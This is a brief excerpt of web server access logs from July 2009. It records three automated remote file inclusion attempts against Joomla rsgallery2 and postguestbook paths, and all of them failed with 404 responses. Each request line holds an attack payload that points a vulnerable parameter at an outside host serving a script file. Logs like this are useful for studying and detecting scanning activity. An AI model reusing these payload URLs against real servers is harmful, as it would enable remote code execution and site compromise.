125.241.54.8 - - [26/Jul/2009:09:30:15 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:30:18 -0700] "GET /logs/access_090426.log%20%20//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:30:23 -0700] "GET /logs/access_080327.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
